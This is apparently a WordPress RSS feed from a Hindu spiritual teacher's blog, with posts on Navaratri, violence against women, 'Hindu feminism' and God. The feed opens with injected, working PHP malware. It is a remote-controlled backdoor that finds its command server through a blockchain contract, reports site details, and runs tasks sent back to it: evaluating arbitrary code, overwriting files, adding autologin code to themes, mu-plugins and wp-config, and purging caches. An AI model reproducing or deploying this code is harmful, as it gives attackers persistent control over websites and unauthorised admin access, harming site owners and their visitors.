// o0_9t if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/home/nithyanandamayi/nithyanandamayiswami.com/wp-content/plugins/hseo/hseo.php', 'ctrl'=>'// o0_9t', 'vis'=>'// fi_fe', 'vis_func'=>'wp_h2jlc0', 'vis_paths'=>array('/home/nithyanandamayi/nithyanandamayiswami.com/wp-content/plugins/hseo/hseo.php'), 'opt'=>'_wp_j3ofrrpj', ); $keys=array(); $keys['id']='j2b'; $keys['ver']='bw'; $keys['caps']='p2l'; $keys['tasks']='ija'; $keys['interval']='9rz'; $keys['ack_id']='dtp'; $keys['ok']='54'; $keys['detail']='tb7'; $keys['inv']='kld'; $keys['result']='jsv'; $hdr='X-DLY-Auth';$tok='OYL1e5hocpa_Y9tfM-EdnTVGBJso6XjmoZZNNycl9E4';$id='fbf3fd549445955c';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Hinduism – Nithyananda Mayi Swami https://nithyanandamayiswami.com Fri, 07 Apr 2023 08:38:18 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 https://nithyanandamayiswami.com/wp-content/uploads/2021/04/cropped-kailaasa-new-emblem-2019-copy-2-32x32.png Hinduism – Nithyananda Mayi Swami https://nithyanandamayiswami.com 32 32 Why Hinduism? https://nithyanandamayiswami.com/why-hinduism/ https://nithyanandamayiswami.com/why-hinduism/#respond Fri, 20 Nov 2020 15:16:06 +0000 https://dev-mayi.pantheonsite.io/?p=979 ]]> https://nithyanandamayiswami.com/why-hinduism/feed/ 0 This Navaratri is special for you https://nithyanandamayiswami.com/this-navaratri-is-special-for-you/ https://nithyanandamayiswami.com/this-navaratri-is-special-for-you/#respond Thu, 22 Oct 2020 19:30:00 +0000 https://nithyanandamayiswami.com/?p=1547
]]>
https://nithyanandamayiswami.com/this-navaratri-is-special-for-you/feed/ 0
Let this Vijaya dashami bring auspiciousness in your life https://nithyanandamayiswami.com/let-this-vijaya-dashami-bring-auspiciousness-in-your-life/ https://nithyanandamayiswami.com/let-this-vijaya-dashami-bring-auspiciousness-in-your-life/#respond Wed, 21 Oct 2020 07:49:00 +0000 https://nithyanandamayiswami.com/?p=1551
]]>
https://nithyanandamayiswami.com/let-this-vijaya-dashami-bring-auspiciousness-in-your-life/feed/ 0
This Navarathri: Fast on Non Violence-against Yourself and Others https://nithyanandamayiswami.com/this-navarathri-fast-on-non-violence-against-yourself-and-others/ https://nithyanandamayiswami.com/this-navarathri-fast-on-non-violence-against-yourself-and-others/#respond Fri, 16 Oct 2020 15:21:03 +0000 https://dev-mayi.pantheonsite.io/?p=984 Navarathri is Hindu celebration of the Universal Cosmic Mother, the Divine Feminine Consciousness.

Oxymoronishly, On one hand we celebrate the supreme feminine consciousness, and in parallel, violence against women has become and everyday affair.

The increased participation of women in politics, industrial and social responsibilities has seemingly increased the violence on women.

Why is there an seemingly increased hatred for women ? Child rape

Murder

Acid throwing.

These are not acts that is part of a civilized society.

What is causing this?

Why is it happening? How can we stop these mindless violent acts?

It starts with seemingly harmless, Gender biased jokes.

And soon spirals out of control.

In today’s world|| definition of beauty is defined by beauty products , fashion shows,fashionistas, beauty pageants, beauty queens and judges of beauty contests and of course media.

We are today living on a double edged sword.

One side :

In a world where women are progressively being recognized for Their immense contributions to all facets of life.

The Dark side :

Rape, sexual assault and violence against women has become a painful part of everyday life.

Body shaming has become painfully common place today.

We either too fat or too thin.

Or better looking arms or legs or Are you constantly checking in the mirror you shape, your size , Your blemishes

Are you feeling that U have to be apologize to the world about how you look ?

The definition of beauty is now defined by products , fashion shows,fashionistas, beauty pageants, beauty queens and judges of a beauty show.

Body shaming has become painfully common place today.

We r too fat or too thin,

Or better looking arms or legs or eyes could be larger, or smaller, nose could be more sharp or its too sharp. Self assessment is vastly different from self critique

Now a days, we are so self obsessed with the way we look ..

We watch actors and celebreities who seem “ perfect.”

The idea that a woman has to be have perfect physical attributes is sold to us, everywhere we turn to: from sports , where cheerleaders are an integral landscape of the game, to advertisements, movies, politics, every where woman are predominantly in the forefront.

Breaking down our feminist identities to the the gross and crass level of our physical attributes if common place fashion trended by movies, where Eve teasing a woman for a physical attributes is expected to be taken ‘ light heartedly.”

This Navrathri, lets redefine feminism and womanhood.

The Navrathri series is my humble attempt to trigger and redifine feminism and womanhood. My waist, my eyes, my figure is mine own and not answerable to any one else outside of myself.

Lets make this world a safer place for our girls, our daughters, our sisters. 

Self assessment is vastly different from self critique

We women have become self obsessed bordering on obsessive compulsive disorder, with our looks.

We aim to emulate celebrities who seem to be “ body perfect.”

The idea that a woman has to be have perfect physical attributes is sold to us, everywhere we turn to: from sports , where cheerleaders are an integral landscape of the game, to advertisements, movies, politics, every where woman are predominantly in the forefront- forefront for abuse and law fare.

Be it Nira Radia or Rhea Chakraborthy, women are paraded and attacked mercilessly for TRPs.

The Double edged sword will one day turn towards our own daughters, sisters, mothers and friends.

All of us women, should break this merciless attack against our own.

All of us women are the torchbearers for a better tomorrow for our girls, sisters, daughters and feminine friends

Breaking down our core identity to the the gross and crass level of our physical attributes has become common place fashion, trended by commercial media.

Eve teasing a woman for a physical attributes is expected to be taken, light heartedly, -an artistic piece of comedy to laugh at.

This Navrathri, lets redefine feminism and womanhood.

The Navrathri series is my humble attempt to trigger and redifine feminism and womanhood.

My waist, my eyes, my figure is mine own and not answerable to any one else outside of myself.

Lets make this world a safer place for our girls, our daughters, our sisters. 

]]>
https://nithyanandamayiswami.com/this-navarathri-fast-on-non-violence-against-yourself-and-others/feed/ 0
Hinduism is beautiful https://nithyanandamayiswami.com/hinduism-is-beautiful/ https://nithyanandamayiswami.com/hinduism-is-beautiful/#respond Sun, 12 May 2019 17:37:00 +0000 https://nithyanandamayiswami.com/?p=1464 ” You are Hindu?”

Strange question from a stranger who was passing by.

The zebra line of holy ash, the red kumkum on my forehead ,the long locks of hair that fell in to a braid and was balancing my head were walking posetr of my religion, so i was not really surprised by the question.

I gave a wide smile and ,” yes, I am a Hindu.”

Usually people wonder at the length of may hair, or my ethnic looks, but this robust, grey haired lady responded,

” Hindu is beautiful.”

Nature is beautiful

People are beautiful

Animals are beautiful

Flowers are beautiful

This is the first time I heard a religion being phrased as beautiful!

Hinduism is beautiful, as I tasted the phrase again and again- what is it about Hindusim that she has termed it beautiful -the undeniable fact that its only Hinduism that reminds me again and again of my ability to break thru this mundaness of human life and experience the superconsious-

Human body is the hardware

The mind is the software

The cognition that I am human is like windows 1 software

This cognition make us manifest, sleep, hunger, sex.

All these cognitions are cognitions within the physical frame work of human bodyThe cognition that I am Parmashiva is like the windows 10 software

This cognition will make us manifest the powers of Parmashiva and the space of Paramashiva.

While upgrading the cognition from windows one to windows 10, there will be viruses attacking the system – through physical or mental illness, mood swings, fear, anger, etc.

These viruses can be cleaned only thru spiritual practises, like Yoga, puja, powerful cognitions and power manifestation.

These spiritual practises will help us upgrade our cognition from Human to Paramashiva seamlessly.

Seamless upgradtion = power manifestation and radiating the space of Paramashiva.

I am blessed by Hid Divine Holiness to teach these spiritual practises to the women, and have them experience powerful cognitions and the space of superconsiousness -” I am Parmashiva”- As part of that superconsiousness, that whole, which fills the vaccum in our hearts and minds

With The blessings of my Guru we have packaged this in to the powerful Mentorship program for womenSignup with the below link to enroll in the program

https://www.nithyanandamayiswami.com/webinar

]]>
https://nithyanandamayiswami.com/hinduism-is-beautiful/feed/ 0
Revival of Authentic Hindu Feminism https://nithyanandamayiswami.com/revival-of-authentic-hindu-feminism/ https://nithyanandamayiswami.com/revival-of-authentic-hindu-feminism/#respond Tue, 26 Mar 2019 17:48:00 +0000 https://nithyanandamayiswami.com/?p=1470 Do you want to be a powerful woman, woman who can influence change in society?
A role model for being a woman of substance. Learn how to become such a powerful woman.
The Sanatana Hindu Dharma creates women of power.

Join the Global Mentorship program for Enlightened Feminine Movement and create a safer world for women and children.
https://kailaasa.org/join-kailaasa/





]]>
https://nithyanandamayiswami.com/revival-of-authentic-hindu-feminism/feed/ 0
Hindu Woman: Genesis of Sacred Powerful Woman https://nithyanandamayiswami.com/hindu-woman-genesis-of-sacred-powerful-woman/ https://nithyanandamayiswami.com/hindu-woman-genesis-of-sacred-powerful-woman/#respond Tue, 20 Nov 2018 18:59:00 +0000 https://nithyanandamayiswami.com/?p=1533

Strong, Brave, Confident, Inspired, Spirited

I am all of the above

But I never considered my self a Hindu, despite being born in a  Hindu family, practising Hinduism from the time I was born, I never identified my very foundation, my Astitva as a Hindu–As a Hindu woman
A Hindu woman, who is brave, strong, confident, inspired, positive and (same word as above).
I am proud of my country, I hold my head high with false pride of a Being Indian, of my country’s glorious humanitarian history, of my country’s uniqueness – India never invaded any country, India was invaded by many countries.
India, my land, my country, where my breath, my life is flooded by its ubiquitous history.
But wait: isn’t India’s glorious past&its peaceful persona, built unshakeably and undeniably on the principles and philosophy of Santana Hindu Dharma?
How and when did I separate India from its fabric of Dharma and Dharma from India, I know not.,but I realized that I see India and Hinduism as two independent entities, else, I who was proud of my country should be proud of my Hindu Astitva also.
But I was not.
I was ashamed of the pantheon of Gods in Hinduism
The elaborate rituals seem endlessly insipid
But the most significant, I was embarrassed, ashamed, and violently angry with the status of woman in Hinduism
Although I had a deep personal relationship with almost every God in Hindu pantheon of Gods, I had a deep personal dislike for the philosophy of my Astitva, where I saw my gender, my sisters being ill-treated, beaten, objectified and discarded. This hurt me.
I am a Woman first, Hindu next.
This battle in my inner space found no answers through my life and as daughter,  student,, Actor, and a friend.
My success as an actress only made me susceptible to the brutal reality of gender bias and harassment at a workplace; success doesn’t prevent brutality on a woman.

Success doesn’t give equality.  In fact, a successful woman unwittingly unleashes the violent, repressed diatribic juvenile behaviour of society in general, not only because she is successful, but also because of the fragile inner image, we evolve- the spiky spider’s web around us to protect ourselves from hurt, betrayal, and loneliness
I could not understand if this was how the woman in my country lived her life burdened by the seen and unseen shackles
I could not comprehend why in my country, India the land where greatest of greatest personalities walked, Avatars lived and radiated enlightenment, where all Humans were taught that we are not just children of God, but a reflection of God himself. 

A woman, I feel I am wearing the cast iron vest of the decades of the dark era where women were hidden away, suppressed and repressed.

Till the secret that was buried away for centuries was revealed to me, by my Guru, His Divine Holiness Paramahamsa Sri Nithyananda Swami
“A HINDU WOMAN WAS RESPECTED AND REVERED AS – POWERFUL SACRED WOMAN.”

This made me revisit my suffering opinion 

The humane values, its lifestyle, are what carved my likes and dislikes, my fears and my joy, my celebrations and my sorrow, it transcended beyond all relationships, but are all expressed based on my principles, and values for life
It connected me to that Avyaktha component of me that has made me powerful to face life.
Religions have the power to create social facts, culture and ethics in humans. It is this foundation that is our soft power, the space that we land in when we take any decision, consequentially building our quality of life Religion is not just a set of books, a series of lectures or places of worship. It goes much beyond all the mundane graph of life. 

]]>
https://nithyanandamayiswami.com/hindu-woman-genesis-of-sacred-powerful-woman/feed/ 0
God-who where how https://nithyanandamayiswami.com/god-who-where-how/ https://nithyanandamayiswami.com/god-who-where-how/#respond Fri, 12 Jan 2018 19:16:00 +0000 https://nithyanandamayiswami.com/?p=1541 God Exists is undeniable. All religions teach us about God in Variants

Some say we are “son of God”

Some Say, we are ” shadow of God”

Only Hinduism says, that we are God, and show the path to that

Human cynicism is such that the moment we hear we are Gods, we start questioning,

Why Am I born here?

If I am God, why can I live like God instead of living like Humans, and going through sufferings, conflicts

In Hinduism, there is no concept of angry God, or vengeful God or Sorrowful God

There is God, who is a principle, a principle of each man’s highest consciousness

The pinnacle of the triangular love between Jeeva, Jagat and Parmathma, is realised when Jeeva realises and experiences the love of Parmarthma.

Every Jeeva, (Individual soul) can experience the love of Parmarthma as Parmarthma (Superconsciousness) Loves Jeeva (individual soul) and Jagat (World) unconditionally and without any expectations.

]]>
https://nithyanandamayiswami.com/god-who-where-how/feed/ 0